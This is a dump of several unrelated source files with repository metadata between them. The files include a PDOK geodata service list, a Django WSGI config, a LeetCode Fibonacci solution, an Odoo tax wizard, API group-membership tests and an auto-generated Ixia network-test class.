('wms', 'Stort- en loswallen (WMS | Open)','https://geodata.nationaalgeoregister.nl/stortenloswallen/wms?request=GetCapabilities'),
('wfs', 'Stort- en loswallen (WFS | Open)','https://geodata.nationaalgeoregister.nl/stortenloswallen/wfs?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/t
('wms','TOP1000raster (WMS | Open)','https://geodata.nationaalgeoregister.nl/top1000raster/wms?request=GetCapabilities'),
('wms','TOP100raster (WMS | Open)','https://geodata.nationaalgeoregister.nl/top100raster/wms?request=GetCapabilities'),
# zit in algememe wmts caps: TOP10NL (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/top10nl?VERSION=1.0.0&request=GetCapabilities
# geen TMS: TOP10NL (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/top10nl@EPSG:28992@png8
('wms','TOP10NL (WMS | Open) ','https://geodata.nationaalgeoregister.nl/top10nlv2/wms?request=GetCapabilities'),
# zit in algememe wmts caps: TOP250raster (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/top250raster?VERSION=1.0.0&request=GetCapabilities
# geen TMS: TOP250raster (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/top250raster@EPSG:28992@png8
('wms', 'TOP250raster (WMS | Open) ','https://geodata.nationaalgeoregister.nl/top250raster/wms?&Request=getcapabilities'),
#zit in algemene wmts caps: Top25raster (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/top25raster?VERSION=1.0.0&request=GetCapabilities
('wms','TOP25raster (WMS | Open)','https://geodata.nationaalgeoregister.nl/top25raster/wms?request=GetCapabilities'),
# zit in algememe wmts caps: TOP50raster (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/top50raster?VERSION=1.0.0&request=GetCapabilities
('wms', 'TOP500raster (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/top500raster/wms?request=GetCapabilities'),
# geen TMS: TOP50raster (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/top50raster@EPSG:28992@png8
('wms', 'TOP50raster (WMS | Open) ','https://geodata.nationaalgeoregister.nl/top50raster/wms?&Request=getcapabilities'),
# zit in algememe wmts caps: TOP50vector (WMTS | Open) http://geodata.nationaalgeoregister.nl/wmts/top50vector?VERSION=1.0.0&request=GetCapabilities
# geen TMS: TOP50vector (TMS | Open) http://geodata.nationaalgeoregister.nl/tms/1.0.0/top50vector@EPSG:28992@png8
#('wms', 'TOP50vector (WMS | Open) ','https://geodata.nationaalgeoregister.nl/top50vector/wms?&Request=getcapabilities'),
('wms', 'Transport Netwerken - Kabelbanen (INSPIRE geharmoniseerd) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/inspire/tn-c/wms?&request=GetCapabilities'),
('wfs', 'Transport Netwerken - Kabelbanen (INSPIRE geharmoniseerd) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/inspire/tn-c/wfs?&request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/v
('wms', 'Vaarweg Informatie Nederland (VIN) (WMS | Open) ','https://geodata.nationaalgeoregister.nl/vin/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs', 'Vaarweg Informatie Nederland (VIN) (WFS | Open) ','https://geodata.nationaalgeoregister.nl/vin/wfs?version=1.0.0&request=GetCapabilities '),
('wms', 'Verkeersscheidingsstelsel (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/verkeersscheidingsstelsel/wms?request=getcapabilities'),
('wfs', 'Verkeersscheidingsstelsel (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/verkeersscheidingsstelsel/wfs?request=getcapabilities'),
('wms', 'Verspreidingsgebied habitattypen (WMS | Open)','https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidinghabitattypen/wms?request=GetCapabilities'),
('wfs', 'Verspreidingsgebied habitattypen (WFS | Open)','https://geodata.nationaalgeoregister.nl/habitatrichtlijnverspreidinghabitattypen/wfs?request=GetCapabilities'),
('wms', 'Vervoersnetwerken - Waterwegen (INSPIRE geharmoniseerd) (WMS | Open)', 'http://geodata.nationaalgeoregister.nl/inspire/tn-w/wms?&request=GetCapabilities'),
('wfs', 'Vervoersnetwerken - Waterwegen (INSPIRE geharmoniseerd) (WFS | Open)', 'http://geodata.nationaalgeoregister.nl/inspire/tn-w/wfs?&request=GetCapabilities'),
('wms', 'Vogelrichtlijn verspreiding van soorten (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/vogelrichtlijnverspreidingsoorten/wms?request=GetCapabilities'),
('wfs', 'Vogelrichtlijn verspreiding van soorten (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/vogelrichtlijnverspreidingsoorten/wfs?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/w
('wms', 'Waterschappen Administratieve eenheden INSPIRE (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wsaeenhedeninspire/wms?request=GetCapabilities'),
('wms', 'Waterschappen Hydrografie INSPIRE (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wshydrografieinspire/wms?request=GetCapabilities'),
('wms', 'Waterschappen Kunstwerken IMWA (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wskunstwerkenimwa/wms?request=GetCapabilities'),
('wms', 'Waterschappen Nuts-Overheidsdiensten INSPIRE (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wsdiensteninspire/wms?request=GetCapabilities'),
('wms', 'Waterschappen Oppervlaktewateren IMWA (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wsaoppervlaktewaterenimwa/wms?request=GetCapabilities'),
('wms', 'Waterschappen Waterbeheergebieden IMWA (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wswaterbeheergebiedenimwa/wms?request=GetCapabilities'),
('wms', 'Weggegevens (Weggeg) (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/weggeg/wms?SERVICE=WMS&request=GetCapabilities'),
('wfs', 'Weggegevens (Weggeg) (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/weggeg/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Wetlands (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/wetlands/ows?service=wms&request=getcapabilities'),
('wfs', 'Wetlands (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/wetlands/wfs?version=1.0.0&request=GetCapabilities'),
('wms', 'Windsnelheden 100m hoogte (WMS | Open)','https://geodata.nationaalgeoregister.nl/windkaart/wms?request=GetCapabilities'),
('wfs', 'Windsnelheden 100m hoogte (WFS | Open)','https://geodata.nationaalgeoregister.nl/windkaart/wfs?request=GetCapabilities'),
# https://www.pdok.nl/nl/producten/pdok-services/overzicht-urls/z
('wms', 'Zeegraskartering (WMS | Open)', 'https://geodata.nationaalgeoregister.nl/zeegraskartering/wms?request=GetCapabilities'),
('wfs', 'Zeegraskartering (WFS | Open)', 'https://geodata.nationaalgeoregister.nl/zeegraskartering/wfs?request=GetCapabilities'),
]
# testing
_services = [
('wfs', 'Administratieve Eenheden (INSPIRE geharmoniseerd) (WFS | Open)','https://geodata.nationaalgeoregister.nl/inspire/au/wfs?&request=GetCapabilities&service=WFS'),
]
firstOne = True
# fix_print_with_import
print('{"services":[', end=' ')
for (stype, title, url) in services:
#print '\n --> %s'%url
if stype == 'wms':
handleWMS(url)
elif stype == 'wmts':
handleWMTS(url)
elif stype == 'wfs':
handleWFS(url)
elif stype == 'wcs':
handleWCS(url)
# fix_print_with_import
print(']}')
|
[
"[email protected]"
] | |
dc9eb9176a34b44ab604ad897356666d4d12c447
|
2a0865c583a12c66fdd1e7a62535b3e35482d37b
|
/CarAI/joshua_work/old/tutorial/Code/04_code/Shaders/src/main.py
|
33201b106c05887838ee512d0fd001dcefad566b
|
[] |
no_license
|
MyAusweis/UnrealAI
|
fe4a6df2859143cd4ca66a063016fc4d22d62bb7
|
9e5ad6b93df7ecf2293de10d41f09969c42404b3
|
refs/heads/master
| 2022-02-11T12:43:52.129313 | 2018-07-01T22:08:23 | 2018-07-01T22:08:23 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 109 |
py
|
from Application import Application
if __name__ == "__main__":
gameApp = Application()
gameApp.run()
|
[
"[email protected]"
] | |
6021a14840f4dfe5737a0e4cca506c1db90ac4e9
|
d721258b53f0f44b1010cb8e8efac8e2a5c96c26
|
/eamon/wsgi.py
|
b12308914222d44e2f8c86e1c45d9fd3a9fb0f6b
|
[
"LicenseRef-scancode-proprietary-license",
"MIT"
] |
permissive
|
kdechant/eamon
|
a6662285f51a6cad5797bb9be92ca709ae36921c
|
080a43aa80c3a1605c402e68616545a8e9c7975c
|
refs/heads/master
| 2023-05-24T08:20:18.551604 | 2022-08-14T10:27:01 | 2023-04-08T07:31:45 | 49,559,304 | 28 | 7 |
MIT
| 2023-03-14T21:09:55 | 2016-01-13T08:07:28 |
TypeScript
|
UTF-8
|
Python
| false | false | 561 |
py
|
"""
WSGI config for eamonproj project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
import time
import traceback
import signal
import sys
from django.core.wsgi import get_wsgi_application
sys.path.append('/var/www/vhosts/eamon')
sys.path.append('/var/www/vhosts/eamon/venv/lib/python3.5/site-packages')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "eamon.settings")
application = get_wsgi_application()
|
[
"[email protected]"
] | |
ab9d65909b79eb706fa5cf8aaf2e9c7dcf02f382
|
036a41c913b3a4e7ae265e22a672dd89302d3200
|
/LOCF_剑指Offer/Offer10I/Offer10I_Python_1.py
|
766252643cf67ffa677bc1c16c41cc875a9d4433
|
[] |
no_license
|
ChangxingJiang/LeetCode
|
e76f96ebda68d7ade53575354479cfc33ad4f627
|
a2209206cdd7229dd33e416f611e71a984a8dd9e
|
refs/heads/master
| 2023-04-13T15:23:35.174390 | 2021-04-24T05:54:14 | 2021-04-24T05:54:14 | 272,088,506 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 344 |
py
|
class Solution:
def fib(self, n: int) -> int:
if n == 0:
return 0
if n == 1:
return 1
a = 0
b = 1
for _ in range(n - 1):
a, b = b, a + b
return b % 1000000007
if __name__ == "__main__":
print(Solution().fib(2)) # 1
print(Solution().fib(5)) # 5
|
[
"[email protected]"
] | |
dcbf41f5c810985b668d17f1de7878308645db71
|
0644c03cc3f89b0fc22d9e548a2d06e6a594f1b4
|
/l10n_th_account_pit/wizard/print_wht_cert_wizard.py
|
a526a3939af6f823385ad6781a822ab337ec3e31
|
[] |
no_license
|
phongyanon/pb2_addons
|
552fbf4cd904c81a1fd0ac5817dc1cf8f3377096
|
4c69002eeda2de8e806c8a168d8ba9f28527c8d2
|
refs/heads/master
| 2021-01-19T13:20:53.749866 | 2017-12-20T11:12:51 | 2017-12-20T11:12:51 | 97,184,424 | 0 | 0 | null | 2017-07-14T02:29:53 | 2017-07-14T02:29:52 | null |
UTF-8
|
Python
| false | false | 1,638 |
py
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api
class PrintWhtCertWizard(models.TransientModel):
_inherit = 'print.wht.cert.wizard'
@api.model
def _prepare_wht_line(self, voucher):
wht_lines = []
if self._context.get('pit_withhold', False):
for line in voucher.pit_line:
vals = {
'pit_id': line.id,
'wht_cert_income_type': line.wht_cert_income_type,
'wht_cert_income_desc': line.wht_cert_income_desc,
'base': line.amount_income,
'amount': line.amount_wht,
}
wht_lines.append((0, 0, vals))
else:
wht_lines = super(PrintWhtCertWizard,
self)._prepare_wht_line(voucher)
return wht_lines
@api.model
def _save_selection(self):
if self._context.get('pit_withhold', False):
if not self.voucher_id.income_tax_form:
self.voucher_id.income_tax_form = self.income_tax_form
self.voucher_id.tax_payer = self.tax_payer
for line in self.wht_line:
line.pit_id.write({
'wht_cert_income_type': line.wht_cert_income_type,
'wht_cert_income_desc': line.wht_cert_income_desc,
})
else:
super(PrintWhtCertWizard, self)._save_selection()
class WhtCertTaxLine(models.TransientModel):
_inherit = 'wht.cert.tax.line'
pit_id = fields.Many2one(
'personal.income.tax',
string='PIT Line',
readonly=True,
)
|
[
"[email protected]"
] | |
dbd41fc82545780aec01e119160e4bf1141ad632
|
7fb95b0e0fbc9af63d002e8f589ec464f11b2dcf
|
/mozy/apps/mosaic/migrations/0005_auto_20150502_1437.py
|
6e631a504f97df9ac28d2b5626e3d8a4e2368147
|
[
"MIT"
] |
permissive
|
pipermerriam/mozy
|
2907656de8a724abb1f635235ba8d572cdc1a2c9
|
472d3dc77519aae8abd719819f07a929cfd53641
|
refs/heads/master
| 2023-08-28T09:41:43.696557 | 2015-05-03T10:39:46 | 2015-05-03T10:39:46 | 33,761,997 | 0 | 0 | null | 2015-04-23T18:40:44 | 2015-04-11T04:04:59 |
Python
|
UTF-8
|
Python
| false | false | 633 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mosaic', '0004_auto_20150502_1351'),
]
operations = [
migrations.RemoveField(
model_name='normalizedsourceimage',
name='tile_size',
),
migrations.AlterField(
model_name='mosaicimage',
name='tile_size',
field=models.PositiveSmallIntegerField(default=40, choices=[(20, b'20 pixels'), (40, b'40 pixels'), (60, b'60 pixels'), (80, b'80 pixels')]),
),
]
|
[
"[email protected]"
] | |
f2a1af90f8f17139a5a61568bb00db96f91ff840
|
b3aba10f1d40bf5dc2fd2bc86d7c8d17c02ad214
|
/Python/InterfaceFolder/Interface.py
|
c96c5d964afabbf13d46c5cc5caeb7ad9978552d
|
[] |
no_license
|
jjdblast/BigData
|
2259d8dd6dc774e85c34c9fcb8ef845b099f0dbb
|
442d330da61d3a1cd14a63421a345c1b0b0bd64a
|
refs/heads/master
| 2020-12-31T05:10:05.291026 | 2016-07-28T09:47:01 | 2016-07-28T09:47:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 184 |
py
|
#coding:utf-8
'''
Created on 2016年6月2日
@author: giant
'''
def my_callback(input):
print "hellow world"
print "function my_callback was called with %s input" % (input,)
|
[
"[email protected]"
] | |
1b42675fbf142b3e48ac2775be3f1aff0ce1c4fd
|
154ec3de1efcf3c97d154ac2ed0c7cd1c9a25040
|
/tests/functional/api/groups/test_members.py
|
90e089513d00899657c073b57cee6c7a522d376d
|
[
"BSD-3-Clause",
"BSD-2-Clause-Views",
"BSD-2-Clause"
] |
permissive
|
Manuelinux/kubeh
|
98a9c5c0a98be67c3583dd222bd74046cd5ee484
|
a549f0d1c09619843290f9b78bce7668ed90853a
|
refs/heads/master
| 2023-03-16T00:51:43.318292 | 2021-09-17T03:33:14 | 2021-09-17T03:33:14 | 211,371,455 | 0 | 0 |
BSD-2-Clause
| 2023-03-03T07:20:50 | 2019-09-27T17:37:10 |
Python
|
UTF-8
|
Python
| false | false | 8,769 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import pytest
import base64
from h.models.auth_client import GrantType
native_str = str
class TestReadMembers:
def test_it_returns_list_of_members_for_restricted_group_without_authn(
self, app, factories, db_session
):
group = factories.RestrictedGroup()
group.members = [factories.User(), factories.User(), factories.User()]
db_session.commit()
res = app.get("/api/groups/{pubid}/members".format(pubid=group.pubid))
assert res.status_code == 200
assert len(res.json) == 3
def test_it_returns_list_of_members_if_user_has_access_to_private_group(
self, app, factories, db_session, group, user_with_token, token_auth_header
):
user, _ = user_with_token
group.members.append(user)
db_session.commit()
res = app.get(
"/api/groups/{pubid}/members".format(pubid=group.pubid),
headers=token_auth_header,
)
returned_usernames = [member["username"] for member in res.json]
assert user.username in returned_usernames
assert group.creator.username in returned_usernames
assert res.status_code == 200
def test_it_returns_404_if_user_does_not_have_read_access_to_group(
self, app, group, user_with_token, token_auth_header
):
# This user is not a member of the group
user, _ = user_with_token
res = app.get(
"/api/groups/{pubid}/members".format(pubid=group.pubid),
headers=token_auth_header,
expect_errors=True,
)
assert res.status_code == 404
def test_it_returns_empty_list_if_no_members_in_group(self, app):
res = app.get("/api/groups/__world__/members")
assert res.json == []
class TestAddMember:
def test_it_returns_http_204_when_successful(
self, app, third_party_user, third_party_group, auth_client_header
):
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=third_party_group.pubid, userid=third_party_user.userid
),
headers=auth_client_header,
)
assert res.status_code == 204
def test_it_adds_member_to_group(
self, app, third_party_user, third_party_group, auth_client_header
):
app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=third_party_group.pubid, userid=third_party_user.userid
),
headers=auth_client_header,
)
assert third_party_user in third_party_group.members
def test_it_ignores_forwarded_user_header(
self,
app,
third_party_user,
factories,
third_party_group,
db_session,
auth_client_header,
):
headers = auth_client_header
user2 = factories.User(authority="thirdparty.com")
db_session.commit()
headers[native_str("X-Forwarded-User")] = native_str(third_party_user.userid)
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=third_party_group.pubid, userid=third_party_user.userid
),
headers=auth_client_header,
)
assert third_party_user in third_party_group.members
assert user2 not in third_party_group.members
assert res.status_code == 204
def test_it_is_idempotent(
self, app, third_party_user, third_party_group, auth_client_header
):
app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=third_party_group.pubid, userid=third_party_user.userid
),
headers=auth_client_header,
)
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=third_party_group.pubid, userid=third_party_user.userid
),
headers=auth_client_header,
)
assert third_party_user in third_party_group.members
assert res.status_code == 204
def test_it_returns_404_if_authority_mismatch_on_user(
self, app, factories, group, auth_client_header
):
user = factories.User(authority="somewhere-else.org")
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=group.pubid, userid=user.userid
),
headers=auth_client_header,
expect_errors=True,
)
assert res.status_code == 404
def test_it_returns_404_if_malformed_userid(
self, app, factories, group, auth_client_header
):
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=group.pubid, userid="[email protected]"
),
headers=auth_client_header,
expect_errors=True,
)
assert res.status_code == 404
def test_it_returns_404_if_authority_mismatch_on_group(
self, app, factories, user, auth_client_header
):
group = factories.Group(authority="somewhere-else.org")
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=group.pubid, userid=user.userid
),
headers=auth_client_header,
expect_errors=True,
)
assert res.status_code == 404
def test_it_returns_404_if_missing_auth(self, app, user, group):
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=group.pubid, userid=user.userid
),
expect_errors=True,
)
assert res.status_code == 404
def test_it_returns_404_with_token_auth(self, app, token_auth_header, user, group):
res = app.post_json(
"/api/groups/{pubid}/members/{userid}".format(
pubid=group.pubid, userid=user.userid
),
headers=token_auth_header,
expect_errors=True,
)
assert res.status_code == 404
class TestRemoveMember:
def test_it_removes_authed_user_from_group(
self, app, group, group_member_with_token
):
group_member, token = group_member_with_token
headers = {
native_str("Authorization"): native_str("Bearer {}".format(token.value))
}
app.delete("/api/groups/{}/members/me".format(group.pubid), headers=headers)
# We currently have no elegant way to check this via the API, but in a
# future version we should be able to make a GET request here for the
# group information and check it 404s
assert group_member not in group.members
@pytest.fixture
def user(db_session, factories):
user = factories.User(authority="example.com")
db_session.commit()
return user
@pytest.fixture
def third_party_user(db_session, factories):
user = factories.User(authority="thirdparty.com")
db_session.commit()
return user
@pytest.fixture
def auth_client(db_session, factories):
auth_client = factories.ConfidentialAuthClient(
authority="thirdparty.com", grant_type=GrantType.client_credentials
)
db_session.commit()
return auth_client
@pytest.fixture
def auth_client_header(auth_client):
user_pass = "{client_id}:{secret}".format(
client_id=auth_client.id, secret=auth_client.secret
)
encoded = base64.standard_b64encode(user_pass.encode("utf-8"))
return {
native_str("Authorization"): native_str(
"Basic {creds}".format(creds=encoded.decode("ascii"))
)
}
@pytest.fixture
def group(db_session, factories):
group = factories.Group()
db_session.commit()
return group
@pytest.fixture
def third_party_group(db_session, factories):
group = factories.Group(authority="thirdparty.com")
db_session.commit()
return group
@pytest.fixture
def group_member(group, db_session, factories):
user = factories.User()
group.members.append(user)
db_session.commit()
return user
@pytest.fixture
def group_member_with_token(group_member, db_session, factories):
token = factories.DeveloperToken(userid=group_member.userid)
db_session.add(token)
db_session.commit()
return (group_member, token)
@pytest.fixture
def user_with_token(db_session, factories):
user = factories.User()
token = factories.DeveloperToken(userid=user.userid)
db_session.add(token)
db_session.commit()
return (user, token)
@pytest.fixture
def token_auth_header(user_with_token):
user, token = user_with_token
return {native_str("Authorization"): native_str("Bearer {}".format(token.value))}
|
[
"[email protected]"
] | |
accd25f62f52cf65f8c258e2dcce607d5f25fb6f
|
1db2e2238b4ef9c1b6ca3b99508693ee254d6904
|
/develop/distribution_analysis/get_distribution.py
|
ed2a0fbe5958631f1fe4ab77686f8e4032248c97
|
[] |
no_license
|
pgreisen/pythonscripts
|
8674e08095f76edf08ef2059300349218079724c
|
0aadf8f96d19b306c1bc44a772e766a06fe3408b
|
refs/heads/master
| 2021-07-06T23:54:57.774342 | 2021-06-08T19:36:36 | 2021-06-08T19:36:36 | 22,017,192 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,090 |
py
|
#!/usr/bin/env python
import os,shutil
from optparse import OptionParser
from pylab import *
from numpy import mean,median
def read_file(filename):
f = open(filename,'r')
number = [float(number.strip('\n')) for number in f.readlines() ]
f.close()
return number
def concatenate_lists(a,b):
c = a+b
return c
def main():
parser = OptionParser()
parser.add_option('-f',dest='datafile',
help='Datafile')
parser.add_option('-l',dest='list_of_datafiles',
help='List containing naming of data files')
parser.add_option('-c',dest='concatenate',
help='Should all the data be pooled together')
(options,args) = parser.parse_args()
# String of atom names from the ligand to be aligned with
# Set the path to the pdb file
datafile = options.datafile
list_of_datafiles = options.list_of_datafiles
total_data = []
concatenate = False
if(datafile != None):
datafile = read_file(datafile)
hist(datafile,100,normed=1)
savefig('histogram.png')
# Multiple disitrbution plot
elif(list_of_datafiles != None):
fl_list = open(list_of_datafiles,'r')
f = [f.strip('\n') for f in fl_list.readlines() ]
fl_list.close()
if(concatenate == True):
for ln in f:
datafile = read_file(ln)
total_data = concatenate_lists(total_data,datafile)
hist(total_data,100,normed=1)
savefig('histogram.png')
else:
dummy = 0
dataset = []
for ln in f:
dataset.append(read_file(ln))
print "The mean is ", round(mean(dataset[dummy]),3)
print "The median is ",round(median(dataset[dummy]),3)
hist(dataset[dummy],100,normed=1)
dummy = dummy + 1
savefig('mulitple_histogram.png')
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
c5b4671a761c6af7544aae60e57748091d6e641f
|
3ae62276c9aad8b9612d3073679b5cf3cb695e38
|
/easyleetcode/leetcodes/Leetcode_213_House_Robber_II.py
|
f210ce27974ff699d546d9fb5f11a1086db6058f
|
[
"Apache-2.0"
] |
permissive
|
gongtian1234/easy_leetcode
|
bc0b33c3c4f61d58a6111d76707903efe0510cb4
|
d2b8eb5d2cafc71ee1ca633ce489c1a52bcc39ce
|
refs/heads/master
| 2022-11-16T17:48:33.596752 | 2020-07-13T02:55:03 | 2020-07-13T02:55:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 37 |
py
|
print('Leetcode_213_House_Robber_II')
|
[
"[email protected]"
] | |
4bc615c074f5f315a13727627a9fbd705146dd93
|
d12b59b33df5c467abf081d48e043dac70cc5a9c
|
/uhd_restpy/testplatform/sessions/ixnetwork/topology/preestablishedsrlsps_a4b5c388b0a9f1cd18fdc396c2ea1c6a.py
|
d73f4a92ca5ad2273cd9359313bf53df714b30be
|
[
"MIT"
] |
permissive
|
ajbalogh/ixnetwork_restpy
|
59ce20b88c1f99f95a980ff01106bda8f4ad5a0f
|
60a107e84fd8c1a32e24500259738e11740069fd
|
refs/heads/master
| 2023-04-02T22:01:51.088515 | 2021-04-09T18:39:28 | 2021-04-09T18:39:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 29,392 |
py
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class PreEstablishedSrLsps(Base):
"""Pre-Established SR LSPs
The PreEstablishedSrLsps class encapsulates a required preEstablishedSrLsps resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'preEstablishedSrLsps'
_SDM_ATT_MAP = {
'Active': 'active',
'ActiveDataTrafficEndpoint': 'activeDataTrafficEndpoint',
'AssociationId': 'associationId',
'Bandwidth': 'bandwidth',
'BindingType': 'bindingType',
'Bos': 'bos',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'DestinationIpv4Address': 'destinationIpv4Address',
'ExcludeAny': 'excludeAny',
'HoldingPriority': 'holdingPriority',
'IncludeAll': 'includeAll',
'IncludeAny': 'includeAny',
'IncludeBandwidth': 'includeBandwidth',
'IncludeConfiguredERO': 'includeConfiguredERO',
'IncludeEro': 'includeEro',
'IncludeLsp': 'includeLsp',
'IncludeLspa': 'includeLspa',
'IncludeMetric': 'includeMetric',
'IncludePpag': 'includePpag',
'IncludeSrp': 'includeSrp',
'IncludeSymbolicPathNameTlv': 'includeSymbolicPathNameTlv',
'IncludeTEPathBindingTLV': 'includeTEPathBindingTLV',
'InitialDelegation': 'initialDelegation',
'InsertIpv6ExplicitNull': 'insertIpv6ExplicitNull',
'LocalProtection': 'localProtection',
'LspDelegationState': 'lspDelegationState',
'MplsLabel': 'mplsLabel',
'Name': 'name',
'NumberOfEroSubObjects': 'numberOfEroSubObjects',
'NumberOfMetricSubObject': 'numberOfMetricSubObject',
'OverridePlspId': 'overridePlspId',
'PlspId': 'plspId',
'ProtectionLspBit': 'protectionLspBit',
'ReDelegationTimerStatus': 'reDelegationTimerStatus',
'RedelegationTimeoutInterval': 'redelegationTimeoutInterval',
'SetupPriority': 'setupPriority',
'SrcEndPointIpv4': 'srcEndPointIpv4',
'SrcEndPointIpv6': 'srcEndPointIpv6',
'Srv6SID': 'srv6SID',
'StandbyLspBit': 'standbyLspBit',
'SymbolicPathName': 'symbolicPathName',
'Tc': 'tc',
'Ttl': 'ttl',
}
def __init__(self, parent):
super(PreEstablishedSrLsps, self).__init__(parent)
@property
def PcepEroSubObjectsList(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.pceperosubobjectslist_7ea27079d1a1d53cebc6e1e83b2ca0b4.PcepEroSubObjectsList): An instance of the PcepEroSubObjectsList class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.pceperosubobjectslist_7ea27079d1a1d53cebc6e1e83b2ca0b4 import PcepEroSubObjectsList
return PcepEroSubObjectsList(self)
@property
def PcepMetricSubObjectsList(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.pcepmetricsubobjectslist_b1398d82dd25e8e98d50662ebf5ba3d1.PcepMetricSubObjectsList): An instance of the PcepMetricSubObjectsList class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.pcepmetricsubobjectslist_b1398d82dd25e8e98d50662ebf5ba3d1 import PcepMetricSubObjectsList
return PcepMetricSubObjectsList(self)
@property
def Tag(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.tag_e30f24de79247381d4dfd423b2f6986d.Tag): An instance of the Tag class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.tag_e30f24de79247381d4dfd423b2f6986d import Tag
return Tag(self)
@property
def Active(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Activate/Deactivate Configuration.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Active']))
@property
def ActiveDataTrafficEndpoint(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Specifies whether that specific Data Traffic Endpoint will generate data traffic
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ActiveDataTrafficEndpoint']))
@property
def AssociationId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): The Association ID of this LSP.
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AssociationId']))
@property
def Bandwidth(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Bandwidth (bits/sec)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Bandwidth']))
@property
def BindingType(self):
"""
Returns
-------
